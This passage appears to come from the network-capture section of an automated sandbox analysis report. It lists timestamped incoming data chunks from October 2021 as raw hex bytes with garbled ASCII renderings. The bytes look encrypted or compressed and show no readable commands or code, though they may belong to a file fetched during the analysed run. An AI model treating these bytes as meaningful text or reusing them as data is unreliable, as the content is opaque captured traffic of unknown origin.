51 8a 14 99 0f b7 50 3a c3 de af ed 17 be 12 a3 42 42 2a 47 f1 12 3e 18 4d 54 df 4b 12 cc 1b 3f 16 78 63 62 91 e4 99 a7 59 cd c5 ac 52 c2 c1 0c 7e bf 20 6e db 6e Data Ascii: )Tb]y@@C2e+3xFKwhMwy^hhu\YhhP?ACNo9<1Wy;d%>F[\lHPGK8$iWLC<_jJK-_l>8w0QP:BB*G>MTK?xcbYR~ nn
2021-10-13 07:59:22 UTC	867	IN	Data Raw: e4 7b ab e5 3a 0c 68 16 83 f7 03 12 5e 2f 4c d5 96 74 17 52 cf 37 bf 3e 4b 55 29 69 6e 92 1f 62 bf 61 6a 29 71 5a e9 75 2c fd 22 c5 b5 4b cd da da a4 ce 51 18 dd 0a 6d ae 73 60 2a a4 fb 22 f1 dc a3 b3 3c 87 58 83 72 8e 72 88 59 d4 3a 5d 6b 1e af ca fd 3d af 82 47 58 08 e2 9d 01 7b fd 50 53 76 c6 b1 eb 23 1b 4f ef 1c a3 21 0f 68 59 d0 8f 16 2d d6 9d 8c ed 3f 36 f6 da 9a 2c 5d 3c ac ec 69 96 7e 17 31 7b b1 ca 3a bd 51 ad 93 c0 76 15 b5 85 57 28 c1 bd fd 74 6c de a8 43 5b 65 83 13 57 c5 3c e8 c1 6f 8a ad 6d d7 b8 22 84 3d 96 82 fa d7 63 2b 3a 33 4a 4d 7d f4 16 72 95 31 9d 79 0b 38 14 3d 63 c2 c9 6e 08 4b 02 5a 23 e0 73 54 03 2d 9f e6 05 6f e3 ca 34 1d 48 4e 56 c9 96 74 7f 65 72 b2 24 c0 8f f2 75 2a 89 de 0a 57 b0 0e c5 cd 3f 71 4c bc e5 b3 68 05 9d 76 d5 08 Data Ascii: {:h^/LtR7>KU)inbaj)qZu,"KQms`"<XrrY:]k=GX{PSv#O!hY-?6,]<i~1{:QvW(tlC[eW<om"=c+:3JM}r1y8=cnKZ#sT-o4HNVter$uW?qLhv
2021-10-13 07:59:22 UTC	875	IN	Data Raw: 9c 73 c7 12 c7 d8 7b c1 ae bc d8 22 96 2c a0 ec 65 ee 3f 04 0e e6 eb bd d2 b4 f0 0b fb d1 46 3f f1 03 df b4 85 e2 20 c2 2e bf f9 fb 28 5f f7 ba 91 d6 7d b9 1f ec 5f 73 64 6f ca e5 9f ed df 21 7c dc 73 dc 92 47 2f 19 48 87 c9 36 6e dd c6 4b 25 34 3f d3 73 79 22 1a ef 9b 96 92 ea ba e5 e0 a2 66 37 3f d9 72 55 12 ba 7d 61 76 24 49 4e ca bd e0 ab b9 2c e4 14 a6 80 b4 24 27 2b 4b bd b3 5e 8a 0a f5 43 0f a4 b8 54 4d f0 ef 79 50 f1 68 7b 8e c8 50 5b 66 fe f2 23 72 fa 97 7b 7d c3 f4 68 23 f5 43 e1 bc 7a 99 0e 2d 86 c1 a4 4a 84 58 4a c5 b5 f4 a5 c1 23 1c 4c a5 57 79 46 5e d5 a3 06 a7 b4 97 57 09 f9 7b 02 54 81 71 61 48 59 e1 80 bd 38 34 c3 46 18 91 a0 58 29 48 d5 69 c3 27 a6 79 55 b2 83 1c df e9 e5 c0 5e 47 2b c8 69 14 50 c6 e1 5f e4 bd af 7d 22 7d 81 1b c2 3b a3 Data Ascii: s{",e?F? .(_}_sdo!\|sG/H6nK%4?sy"f7?rU}av$IN,$'+K^CTMyPh{P[f#r{}h#Cz-JXJ#LWyF^W{TqaHY84FX)Hi'yU^G+iP_}"};
2021-10-13 07:59:22 UTC	883	IN	Data Raw: 9e e3 83 ee 54 b0 ec 6c 69 2a 47 8c 24 df e9 38 6d 7b d3 0e 9e fd 03 0d 5a 1c 43 3b 34 8c f9 ce 19 f8 02 5b 85 fc 8f bf 17 30 b7 46 ba 94 35 a8 12 aa b9 41 85 ea a5 c9 a7 0a d5 f9 62 98 5c fb bd b7 92 80 44 13 13 54 9d cd 83 fd 67 24 47 a1 1a d9 71 8b 2f 2a bb 77 b7 21 ae ae 96 eb ea 85 38 40 d4 af 76 62 f3 55 39 58 cd 8f 3f 91 61 46 aa a2 02 07 6d cd e6 9c 79 e6 5a 33 f8 61 0d 63 3f 63 9a 05 9d f4 e0 14 31 26 19 ff 0b e6 4c 24 51 dd 29 aa 8f 5c 6e 77 09 3f e4 1b 7c 69 79 38 f1 65 dc 91 65 f8 0f 12 a5 f7 dc dd 7d 23 59 17 d7 8e a7 26 0f 38 81 7e 49 17 f4 a2 a2 04 f1 85 16 9f ce 94 b3 e2 ef 52 7c bc a1 77 c7 f5 1c e5 d4 07 dc c5 34 ad ce 17 dd 30 a1 3d 60 c7 60 81 ad cd 95 cb 52 82 f8 cb 4e 57 02 6d ad 7c 0b 51 97 60 15 b1 8f cf 8b d8 6c d1 be 22 8d e8 28 Data Ascii: TliG$8m{ZC;4[0F5Ab\DTg$Gq/w!8@vbU9X?aFmyZ3ac?c1&L$Q)\nw?\|iy8ee}#Y&8~IR\|w40=``RNWm\|Q`l"(
2021-10-13 07:59:22 UTC	891	IN	Data Raw: 05 5a 36 62 ab fc ac 63 23 46 7d b9 8e 39 0d 1b ad 56 c0 ff aa ea 3e 15 e9 ee 0e f5 5a e2 77 38 bd 86 cf fe b0 63 cf fb 39 27 aa cd 49 60 42 dc c0 c6 a9 ae 1c 12 30 ef 09 f6 40 60 b0 18 e1 f2 e5 8d d9 c4 29 30 b8 6c 0f af ce a2 ea 7b 57 c6 19 1a d0 31 8e bc 34 71 10 db 51 aa 14 66 7a b3 83 1a 28 95 27 28 35 67 41 7b 47 2e 66 ab 0c bb dc a3 af d3 20 de 5a dc 94 b0 20 c9 4c 2c 3e e5 e4 c0 78 16 74 76 c1 68 07 39 42 9b 89 e3 dc a6 2c a2 ea ff fb 6c a1 d4 b3 b8 ed 54 15 59 50 c4 2c 5a a6 55 dd 29 47 29 af d6 8a 78 24 6d 1b 04 34 b9 b9 dd 4f dd 73 80 ba fb 87 0a db d0 1d 98 48 a0 85 db 5b 44 15 40 bd ba ea 38 9a 90 12 d9 d2 03 1a 44 df fd ce 5a 22 a1 ec b3 c2 87 ac 7c 0a 37 0a ca 82 a3 10 5e a2 03 e8 df a6 7a 69 a4 19 9d d7 ee eb 2f e6 9e a7 5d e2 bc 36 a5 9e Data Ascii: Z6bc#F}9V>Zw8c9'I`B0@`)0l{W14qQfz('(5gA{G.f Z L,>xtvh9B,lTYP,ZU)G)x$m4OsH[D@8DZ"\|7^zi/]6
2021-10-13 07:59:22 UTC	898	IN	Data Raw: fc b4 43 f3 17 6c 55 4d 2f 7a bf 7a 86 78 29 4a ef 6d e1 9c c4 a9 38 f2 6f 45 a0 27 81 bc a3 c3 64 bb 8a 52 11 3f 21 7e d3 7f 45 56 48 11 64 ab 87 77 56 6e 85 fd 16 1d 60 a5 4d 47 bf de 9f 38 17 51 ea 07 29 71 af 70 21 37 e8 48 23 0e 8d e7 92 b1 52 54 81 05 20 9f 79 ba f5 0a 88 b8 41 e9 8e 8a 3c ee e3 9a cf a6 25 5e d0 6c fe c5 bd 3d 1c 0b 28 9e 73 99 5c ef ee 92 26 f5 3e 84 4a 45 14 91 3a 19 66 7d c5 ef 53 cd d7 cf 72 12 a6 27 7f 07 42 15 2d 6d 84 fc 4e d1 91 3c 41 93 ec c7 ef 66 89 dd ec 75 1a ea bb cb 8b 19 65 0e bb 16 ef 66 a0 20 72 ed 41 59 49 4e 6e ca 22 e4 30 4e eb 66 9e cb 34 64 7c a6 e6 d3 66 e8 a4 df 4c b4 df e3 6e 55 4b b9 05 e7 78 50 72 02 61 64 8c 01 d4 03 b1 1c 85 5e d8 ba 3a 18 a4 8c a5 f6 d9 45 24 a1 4d f3 57 bc b8 9d 2e a8 bd 34 db e8 50 Data Ascii: ClUM/zzx)Jm8oE'dR?!~EVHdwVn`MG8Q)qp!7H#RT yA<%^l=(s\&>JE:f}Sr'B-mN<Afuef rAYINn"0Nf4d\|fLnUKxPrad^:E$MW.4P
2021-10-13 07:59:22 UTC	906	IN	Data Raw: e6 16 20 9c 9e 73 aa f5 b5 d0 b3 cc 8c 58 28 ad 8b 1d 40 00 31 f6 b4 cc 24 fa ea 55 76 85 3d 6d 42 9d 0f d5 57 d2 b3 dd af 1f 21 6b d3 2a 5b 7f ae a6 54 d9 53 9d 3e de 95 c5 d5 14 3a 1e df 22 7d be 29 04 56 4c 3c 28 d1 8d 70 0e d5 c3 06 d4 36 93 54 b4 72 9d c0 7b df 6e 6f bb 5a 4b ee 37 17 96 f8 be d5 bd 3f 16 b6 23 69 96 04 f4 f7 df ad e0 52 c3 b4 26 a6 22 be 38 7c 85 af df a9 ad 88 81 1a 94 c2 de b1 c9 46 ba b0 cd 6c 63 ff 86 6c 57 56 25 28 7b 01 84 d0 b4 7a cb f5 82 60 5b 0e 11 19 9c 58 7e 27 37 bc 83 ea 08 10 53 e1 74 9f 49 00 06 e5 ce 07 94 fd 54 e2 0f 56 ee 6a fe 06 35 14 64 de 33 08 e5 08 70 df ca 9b 4d 46 49 44 93 b9 14 e6 99 ac 53 49 a1 64 7c 13 c4 14 bf d1 2a b4 ff e8 8f 7b f3 c3 0e 6e a7 20 88 8d e2 3a 21 5b 5a 19 53 0b c1 6e f7 5c 6a 0a 1f a8 Data Ascii: sX(@1$Uv=mBW!k[TS>:"})VL<(p6Tr{noZK7?#iR&"8\|FlclWV%({z`[X~'7StITVj5d3pMFIDSId\|{n :![ZSn\j
2021-10-13 07:59:22 UTC	914	IN	Data Raw: 92 1d 2c 92 a5 73 57 ea 10 77 6b b3 97 c4 80 93 04 13 2c 4d fa a0 04 da 9b 5b 16 be 88 a7 6d 50 6d 29 4e af 93 96 b9 46 7d e9 4f 44 a4 49 5e f9 76 d0 9b e8 44 09 b5 e5 4e ee e7 d3 6e 32 e0 9c b7 ae ac 9f 7e b8 07 b8 64 91 de fb b1 fc 8a 7e 5f 49 fd 3b f2 91 c6 24 94 d7 98 67 db 4a e9 b4 4c b4 18 db 07 29 c9 aa 91 d3 4d 64 97 75 fb e7 57 69 79 c7 f4 a8 54 76 22 22 c5 d2 c5 96 5b e5 f8 14 21 a1 76 dd 68 8b f8 f4 a6 96 5e 78 0b dc d9 9f c5 3a bc f9 51 09 77 a8 8e ea e0 b9 79 73 de 07 1a 2d ce d8 c1 67 2b 6d 46 52 9c e1 e3 e2 4e e8 a2 f3 b2 3f de af 58 49 3b 45 ce ca 2b 1a 0f ce 38 c8 67 8f d9 50 bd 81 1f 4e c5 c1 0a 78 b6 39 f2 b9 02 3b d7 5b 13 32 5c 51 ab db 81 75 e4 a4 e1 00 b4 a7 24 75 23 ca 64 25 4e c5 66 74 90 d7 30 13 2c 64 e7 53 0e bf 9b 44 2a 54 73 Data Ascii: ,sWwk,M[mPm)NF}ODI^vDNn2~d~_I;$gJL)MduWiyTv""[!vh^x:Qwys-g+mFRN?XI;E+8gPNx9;[2\Qu$u#d%Nft0,dSD*Ts
2021-10-13 07:59:22 UTC	922	IN	Data Raw: 28 6a 5e 85 65 a2 66 a5 45 56 2f e5 9e d4 97 ef a4 94 fd 42 ea f4 5d 26 fd 2e 26 cd 56 a9 0c 69 c7 bc d8 6f e4 53 7e 57 20 84 99 ce b5 26 cf 5a 6e bf 72 57 77 a4 d6 74 3d eb f5 0f bc ad af 2b f7 e8 ea ab 3f 89 73 34 5b c7 0c c1 b1 35 75 f4 1f 3d af 58 cf 0b 5e 1d 51 f3 71 42 d5 72 78 20 72 e0 76 08 13 0d 4a 41 7a a5 b6 7b 52 77 66 6f c0 d0 ea e1 8a 1b a0 31 9d d0 5d d7 05 93 b7 b0 19 c4 f2 3b bb e0 9e d4 32 21 53 58 55 87 22 48 8a 2c 0c c8 a5 07 86 13 30 62 12 3e 81 ae 59 d7 c2 9a 96 22 af 19 39 78 ae 01 4b b2 76 f5 a4 bf d2 0b b8 a8 fa a1 16 fe 75 03 47 b9 c5 7d c6 51 cb 77 15 64 15 60 d4 e4 5b 0a 73 c4 14 9c 2d 29 4d 6a 60 4d 0a 46 92 79 28 ae 45 21 35 7b 34 af bc 82 fa 93 2f 4e 45 50 08 4a 9a 8c 0b 52 61 0f c1 40 89 56 e3 d8 e4 7b de e5 5f 14 7f 4b 80 Data Ascii: (j^efEV/B]&.&VioS~W &ZnrWwt=+?s4[5u=X^QqBrx rvJAz{Rwfo1];2!SXU"H,0b>Y"9xKvuG}Qwd`[s-)Mj`MFy(E!5{4/NEPJRa@V{_K
2021-10-13 07:59:22 UTC	930	IN	Data Raw: cf d3 11 cc 45 6b db 68 38 54 e5 3e f0 6a 04 6a 0a f5 d3 9a bd f3 73 8b 46 8b 13 51 e7 fb ab cd 0d a2 0f 32 ea 70 d5 a1 72 84 81 34 ed ad 7c 7c c1 34 fc 80 29 37 09 98 34 a3 63 a8 6d 82 00 a4 fc d9 c5 c5 e4 7e d0 87 43 77 71 eb 46 f4 f3 e2 c6 24 4a ec 79 35 23 c0 db f9 7f 6a 8d b0 94 10 a2 66 06 dd 63 9c 4f 7b 39 7f 65 1f b0 e5 ef 54 59 e9 1c e7 90 61 54 4a 91 dc 59 1a c5 48 1e 78 f0 89 b0 dc 47 6c 79 ed d3 3e f2 3a 8c 5c 6d 45 1e 78 9e 6f 28 e1 92 da f8 df 4a 63 d3 c9 9a b7 79 28 f3 e7 23 dd 21 be 6c c7 87 7a 76 3a 8a bd fc c8 36 0a 65 6a 82 b1 b3 a6 a3 fb 4d 61 1e 9c 61 25 3a ed 42 f1 26 33 b6 32 e3 4f 36 29 51 02 bf 8d 32 d3 43 94 62 55 4f 55 ab b2 71 e0 97 f7 d0 0f 6f ff 0b f7 c3 bf 50 81 34 bf 93 74 38 80 45 98 85 e1 77 1d e7 ad d0 ba d5 cc 05 2f 2e Data Ascii: Ekh8T>jjsFQ2pr4\|\|4)74cm~CwqF$Jy5#jfcO{9eTYaTJYHxGly>:\mExo(Jcy(#!lzv:6ejMaa%:B&32O6)Q2CbUOUqoP4t8Ew/.
2021-10-13 07:59:22 UTC	938	IN	Data Raw: 91 7c 5f d4 b3 db eb 7a e2 7a 9b d2 85 d6 24 d0 c4 46 c3 e9 01 a5 01 ab da 38 ed e3 40 1a 28 70 92 21 4e e4 a8 ba ce 89 c4 e1 2e 59 1e c3 0e a1 cc 60 65 3b 92 0e 48 4c 20 c4 86 74 ec 8c 73 d8 a2 15 5c ea c1 9b 77 09 58 52 1f 2c 97 f8 0d 81 6a 62 2a 90 e4 bd 4d 57 93 63 4d 01 81 b7 ba 84 c4 7f 9a 54 45 51 51 41 e1 98 c0 9d f1 16 62 ed b9 24 2e 39 8d 54 d1 fd a7 4c 8e a3 b9 3f d2 2e 0c d9 12 50 40 ea c7 4e 73 2d c5 32 64 71 09 9c c5 a8 ee a5 dc 64 67 59 03 53 af 9c a2 49 be 91 c0 cf 4c 5b d4 d0 a1 aa 44 a6 91 17 36 74 88 af 86 21 61 08 bd f2 65 02 53 80 59 f1 e3 db b0 cb ea 17 38 60 b8 ca df 6c 45 cb 6a 40 a7 84 fe 16 f3 e5 29 53 79 39 71 4b f0 51 76 9a 75 c1 f2 c9 70 53 4f ba 01 24 1a 8b 47 0b b8 7a a6 8f 1a ff 72 6a cc 69 ba e2 67 f6 a7 ea 7e 49 97 52 3c Data Ascii: \|_zz$F8@(p!N.Y`e;HL ts\wXR,jb*MWcMTEQQAb$.9TL?.P@Ns-2dqdgYSIL[D6t!aeSY8`lEj@)Sy9qKQvupSO$Gzrjig~IR<
2021-10-13 07:59:22 UTC	945	IN	Data Raw: e1 5d e4 34 01 c9 33 6b 70 2e 79 19 5d 78 42 f2 32 db 00 c1 f9 0b e4 05 6a e3 33 e3 3d 4e 6c 7e 0b 35 f4 d2 32 07 31 31 62 df 36 79 43 c7 77 3a 0d 50 76 d4 ba 3d f2 a5 cf bb cc 9b ca 98 4a c1 84 02 81 b6 b7 dc 7a 4c 4f 84 f2 93 e1 d1 6f 7f 93 c7 7d 09 30 cc c2 98 fe 7c ab 3e d0 7e f1 7f 1f 1c 3f 0a 66 42 25 32 99 4d 9c 32 73 79 50 50 ff cc 0c 8e 7c 17 8e 73 cf be 3f db 61 11 b6 6d 36 48 f4 8e 89 4e 8f 95 8b 49 66 cb e8 0b 7c 87 30 92 d5 1b 8c 59 f7 7a a7 b7 b0 86 96 a8 23 b6 ce d5 1b 3c ec b4 46 0f 7f c1 2c dd 6b 64 0b d7 e9 83 ba b0 63 60 42 9f 87 57 ef 95 4b 39 41 e7 0d 0a 36 50 35 2f a2 7b d1 fe ef 86 75 45 04 d2 5b 46 c4 63 73 d6 98 b5 33 31 62 b4 59 7c 0b ea 23 b7 da bb ad 71 bd 2f c8 8b ee 57 fc 4b fa cb ff 05 c8 db 64 66 34 0a 87 76 f2 77 e7 bf f4 Data Ascii: ]43kp.y]xB2j3=Nl~5211b6yCw:Pv=JzLOo}0\|>~?fB%2M2syPP\|s?am6HNIf\|0Yz#<F,kdc`BWK9A6P5/{uE[Fcs31bY\|#q/WKdf4vw
2021-10-13 07:59:22 UTC	953	IN	Data Raw: 62 be 10 fc 4c 20 54 9e 48 0a 6a 4d e9 e1 b5 9a e8 98 b1 67 f6 8d 22 97 fd c3 0d 9b 42 5f e0 d8 6a 64 62 0e c0 b6 36 10 20 18 ff 75 8d 04 a3 0b 79 24 cd 3c b4 69 5e b9 12 b4 1e f9 11 20 68 bd 5e 43 bf 52 93 e0 d7 74 64 d4 e9 45 9d f4 c8 bb 57 00 8d f5 08 b4 97 63 be d7 12 b4 2f ba e0 4b 3b bc d7 45 6b df 44 cd c9 0d cf 63 f8 1a 25 c7 81 f0 0a d5 86 74 97 ad 35 f8 be f3 f2 33 26 c5 cb f2 8c 98 dd 51 62 24 c0 f8 e1 8a 41 e9 e1 1b 4c 25 c9 86 32 a1 76 3e 5c 5a 32 70 30 8f df eb f8 26 08 e7 f6 df ad 01 bc 9c 4c d0 88 40 bb 2e ab 0d f8 1a fe 1e c1 4b 9d bb 77 6f 53 de 72 51 c4 8e a4 3b fc df b5 ee 19 da e8 c8 2e 1a 50 29 84 fb a2 52 18 6b e2 25 bb 77 0d 2d a4 f8 8a b3 f6 f3 0b 1e 5c 53 e9 08 77 ae b4 03 b9 4d 1f 3c 74 8f 9d 4b 59 16 45 29 5c 8a 36 2d 44 66 c4 Data Ascii: bL THjMg"B_jdb6 uy$<i^ h^CRtdEWc/K;EkDc%t53&Qb$AL%2v>\Z2p0&L@.KwoSrQ;.P)Rk%w-\SwM<tKYE)\6-Df
2021-10-13 07:59:22 UTC	961	IN	Data Raw: a8 f6 c1 bc b0 de 0d 8e e2 6f 60 78 e0 fa a9 89 53 00 0f fe 48 de 9e ee 7f 6d 3c 39 de 91 bf 88 dd 6c 4c 87 ba ad a2 5e b7 0c 62 05 a6 76 eb 67 ea 29 2f 84 03 e8 da 18 0f 9c c8 26 69 36 50 03 38 63 01 cd f3 47 2b 78 dc d6 78 6d 49 f0 eb 65 84 47 12 cd e3 63 5b 33 47 e8 9a 5f a6 85 23 26 6d 43 1e 8e bf ab 7a 1c 96 b6 6a e9 99 1e ee b5 c4 32 fc a4 5f 64 bf e1 5f f7 af 6e bf 92 bc 8e e9 0b 9b 0f b5 61 28 eb 57 50 8e 08 83 62 dd b6 57 df 4c 81 17 b7 c8 a6 f2 92 8f b2 10 11 8f 74 06 05 f2 09 71 7a 5e 28 d6 d2 18 ba 78 ba ac 1a e9 bd 95 be f5 c6 db e9 72 55 5e b8 9d 92 76 62 6a 57 69 d5 a7 e1 3e 85 64 ed 8d 38 fe ce c3 e9 73 6d ec 1e 1b 71 6f 86 a8 a7 c2 d3 8e 5b 56 f6 ab e1 56 1d 22 a1 f1 0d 08 f2 12 33 65 3e 43 c0 56 ce 37 e1 1e fe e5 de 6b 1c 5e fd ed 56 fa Data Ascii: o`xSHm<9lL^bvg)/&i6P8cG+xxmIeGc[3G_#&mCzj2_d_na(WPbWLtqz^(xrU^vbjWi>d8smqo[VV"3e>CV7k^V
2021-10-13 07:59:22 UTC	969	IN	Data Raw: 10 6e 9f da c7 bf 54 5a 87 fd c4 e7 48 e3 d1 53 35 10 71 18 80 26 d9 a8 ea f2 ed 75 2b f3 08 86 06 bf 45 02 9c 07 c1 d5 76 5d 2b 82 c4 cb 85 b9 27 f8 b5 ae ca d3 3d e1 a8 74 ea 43 40 71 e1 c1 3d c6 81 cb 73 ca 3a b2 fe e7 94 24 73 e5 06 cc a8 ce 29 66 ae 54 f0 a1 95 1d 23 f0 6a f9 e5 e1 41 d7 75 52 68 bc ab ef f7 ad 71 e0 95 1f 29 4b 0c 6e 25 db e4 53 31 b8 6a f5 93 d2 39 cd be 69 b7 06 b0 80 dd 79 10 25 71 5f 01 20 6b 6d 0a bb d1 4f 97 60 ba 54 43 ff 16 70 d7 aa da ab fd 7f 66 96 b2 5e 2b f8 f8 6b 62 ca 91 46 c5 42 ee 66 a2 14 33 ed f5 b7 0c ae 92 ef eb fb 66 f9 fa 0a 9e 88 db 34 4c e1 5c 93 f9 03 f9 d4 60 a7 f1 3a 12 ec 7e a1 f9 f3 46 5d 1c 17 44 0c b0 c6 63 bd 68 72 fd 1d ac 73 37 42 b6 9a b2 f7 7f 95 6b 8c 02 fc c6 07 17 a1 94 4b 3c be 85 16 bb 45 ff Data Ascii: nTZHS5q&u+Ev]+'=tC@q=s:$s)fT#jAuRhq)Kn%S1j9iy%q_ kmO`TCpf^+kbFBf3f4L\`:~F]Dchrs7BkK<E
2021-10-13 07:59:22 UTC	977	IN	Data Raw: 88 dc db 62 e6 ab ca 62 0c ca 3e 86 16 57 25 01 66 b9 03 36 29 ad d2 5f 64 45 60 51 97 68 3e 7c f9 3f 71 f0 44 ea f4 18 e4 90 54 dd a9 2f 1e 84 c5 f3 bc 46 01 90 c5 cc 6b b8 75 2c 6e 3c 59 ca a9 7e d9 4a f5 aa 12 ca 5f ae 52 bd 79 fb 03 f6 27 ec 8f d9 9f 59 26 a5 3c 75 2b 28 9c c8 f7 60 a9 7a 3e 10 ae fc 8d 0e f0 a8 77 c2 59 43 7a f4 59 5d cb ec 3f e1 13 e6 52 22 bb c9 cb ca ce 86 d7 65 1f 35 89 14 99 0f 26 31 cd f2 f7 80 2e f9 cc 4e 26 a5 bd e1 55 31 30 88 33 2d 9b af cd 8e c0 c2 d5 fd aa a4 b0 8c 06 6e 19 68 88 5c 87 e8 9b 1a aa c9 dd ac 27 35 b0 86 e7 ea a9 eb ea e1 bc 26 aa da c8 7c 62 8e 05 75 b0 01 dc 6f 30 ad b1 7c 3f 86 ca 6a ab ed 9f be 0b a2 6a ab 1c d5 8d d7 f3 d7 49 77 17 6a d5 5d 6a 43 06 f0 22 7d 01 42 b1 d9 5d 2f 98 20 01 51 cb e0 b5 2d e0 Data Ascii: bb>W%f6)_dE`Qh>\|?qDT/Fku,n<Y~J_Ry'Y&<u+(`z>wYCzY]?R"e5&1.N&U103-nh\'5&\|buo0\|?jjIwj]jC"}B]/ Q-
2021-10-13 07:59:22 UTC	984	IN	Data Raw: 22 40 c7 cc 6d 44 48 1a d4 90 4c d1 14 d5 b4 67 26 74 40 d1 4e ba 94 20 67 22 5d 11 f4 96 74 08 41 12 a8 c7 57 45 15 ca a2 29 d1 46 26 99 b6 61 d2 8c a2 ae 2c 9e e6 93 6d 13 26 ed 6c f2 20 6c eb 5a 8b 69 c4 e0 05 19 99 a8 37 b7 29 c3 62 5c a2 dc 5b 0b 00 e1 7c 01 8a 56 1e a8 63 16 41 20 d5 6b 4e 9c 73 e5 a0 86 c6 9c 8d 77 89 4e 08 26 40 42 bb 76 ab 56 8b f1 2d 6b e0 b8 35 a6 14 b6 00 54 60 74 5f d1 4a ae ec 9b b3 53 06 72 a4 6b b8 a7 4d c7 aa 75 b9 8a 4b 64 d4 22 9e 42 21 0a eb cb a6 4c 0d 7b 34 e9 9a 52 cb f2 34 72 32 32 8c 31 a6 b8 c1 6b 83 5a e8 99 f4 d5 94 dd 9b 9a d3 f1 98 28 95 20 0e 33 88 57 68 db d3 4d 1c d8 be 73 17 44 f2 9e 4a ed 3c 9c 2c 95 76 8d a7 98 c7 3a 55 e8 86 2e 53 51 46 6b a4 d1 cd 6b ad 54 49 8f 14 e8 10 e1 99 54 6a da 10 ae b6 4e f3 Data Ascii: "@mDHLg&t@N g"]tAWE)F&a,m&l lZi7)b\[\|VcA kNswN&@BvV-k5T`t_JSrkMuKd"B!L{4R4r221kZ( 3WhMsDJ<,v:U.SQFkkTITjN
2021-10-13 07:59:22 UTC	992	IN	Data Raw: 60 67 e7 e4 a9 5e bb 5e d9 7d 8a 1c 6c 8d 47 60 17 0c 85 d3 91 ef 40 8b 61 93 e0 61 b5 2c 37 36 5d 86 f9 76 e9 2b 8c 4b 1a 6e 89 c0 26 49 3b 45 8d b3 5b 49 25 81 02 9f a8 07 2c 59 b9 f0 a3 06 29 12 1d 98 cc 1b d4 1d 98 19 75 04 db 47 64 1d b1 1d 1a 11 ea 93 4f 03 51 30 33 34 b6 54 08 c2 8d 87 5f cb 7d 4e e6 08 5b 1a b1 4e 0d 9a f6 40 4b 0a f3 94 92 05 11 ae 49 ba 41 b6 6c 59 1f 6c cc cd b2 c5 41 1d 6e a6 e1 5a 9a ee c9 09 4b fa 37 2a df 47 a9 68 32 52 e3 ce a1 55 9a c1 0a 8c 0c 36 b6 d3 41 d9 a0 81 99 a8 4a 10 d5 2d fa e0 0d a4 55 3e 07 74 c8 2a 5a 29 d6 d5 14 eb 34 37 19 24 cb d2 57 bc 12 1a ad 86 11 6c c6 1b 58 e0 0d 36 82 be 27 c7 12 18 fd 10 42 d4 e5 71 ae dd 46 4e 28 b6 fe 2b 52 44 08 53 25 5a 7e a4 e1 d4 86 3f 6c 71 32 07 21 42 2b 68 72 18 1f 87 e8 Data Ascii: `g^^}lG`@aa,76]v+Kn&I;E[I%,Y)uGdOQ034T_}N[N@KIAlYlAnZK7Gh2RU6AJ-U>tZ)47$WlX6'BqFN(+RDS%Z~?lq2!B+hr
2021-10-13 07:59:22 UTC	1000	IN	Data Raw: 5f aa a0 62 3e be 32 cc 59 1d 0a f1 ea e6 93 be 4a d7 f1 5a bb c6 6d c3 25 ad 7e e6 b4 98 ef 7c 92 34 77 67 64 59 d8 78 97 33 54 50 ac 60 f0 6d 80 e3 e5 d9 61 ed 09 11 b5 09 52 a4 33 55 01 b6 d4 66 1e 8d 78 69 63 26 27 9d 94 16 a6 0f a0 41 ad a7 19 91 d1 f0 21 51 bc 5e a8 fc 8e 19 b1 10 41 96 d3 2e 7a 01 a3 57 99 8b ce 07 8d af fc 95 1f 63 71 a4 bc de 6e 56 a7 80 58 72 91 13 da f5 d8 64 ee 09 88 9b 57 9c 75 bd 68 11 11 f8 66 4b 9e 08 b7 b4 26 9c 57 b1 6e f1 89 60 cd 1c cc 33 6f c8 e6 d2 5c 56 69 80 55 53 c2 7e d8 68 22 e1 7c 31 d4 a0 2b 96 e5 e8 ca ca 24 d2 16 0b 8f 63 66 44 ca 1f a9 80 4f 95 86 83 1a d5 a6 72 aa 66 86 98 51 ab 61 56 d8 87 79 b6 6d f7 e0 09 97 90 d0 b3 09 5c 94 ec 47 ad 4c 8c 41 1c 86 7e 5f 07 0e 5d dc 6e b6 cc cf 1a 90 0e 9b 3e 93 7f 81 Data Ascii: _b>2YJZm%~\|4wgdYx3TP`maR3Ufxic&'A!Q^A.zWcqnVXrdWuhfK&Wn`3o\ViUS~h"\|1+$cfDOrfQaVym\GLA~_]n>
2021-10-13 07:59:22 UTC	1008	IN	Data Raw: 5e b0 33 9b 00 e2 66 11 19 f8 e0 e5 9c b2 df b3 1b 85 2d cc ea 48 9f 41 f3 2f 15 1c e1 08 71 4a 0a 2a 1f 97 5e 36 76 3d 9d 8f 4c 8a 03 7c b5 27 42 a6 b6 71 0a 38 56 4f d7 1c 4c 53 d0 38 cb 74 b4 48 d3 00 7c c1 c2 5b 7a e3 2d 2c c0 13 5a 8e b1 ce 3e 39 be b8 b7 87 d1 78 8a a7 53 24 e3 b3 52 78 28 71 d8 7f 2c e9 46 ad 9c 78 cf 39 36 be 3d 94 55 29 fb 37 1e a5 a1 d3 85 1f 5d 77 22 e1 e8 80 ce d5 81 62 5a 99 90 43 be 96 55 3f 9c 98 e1 18 f5 3b 77 11 e0 99 15 80 ca 75 ad c2 bc 9e 17 2a 11 ac 6c c3 64 1b ed a8 2c 7c bd 02 8e 20 2b de e1 dd 4d 15 3c e3 a2 07 69 09 c8 75 36 c8 36 90 51 13 b2 61 24 16 93 5f d9 44 c9 57 e1 f1 3c 63 25 56 f3 9c c4 06 98 de 83 f5 71 a1 85 e8 d3 0e 51 16 cd c3 ab b8 e2 a1 e9 8f 7d 47 de 5e 63 12 af df 1c 6e ca 8f 63 c9 5e 8b d0 24 32 Data Ascii: ^3f-HA/qJ^6v=L\|'Bq8VOLS8tH\|[z-,Z>9xS$Rx(q,Fx96=U)7]w"bZCU?;wuld,\| +M<iu66Qa$_DW<c%VqQ}G^cnc^$2
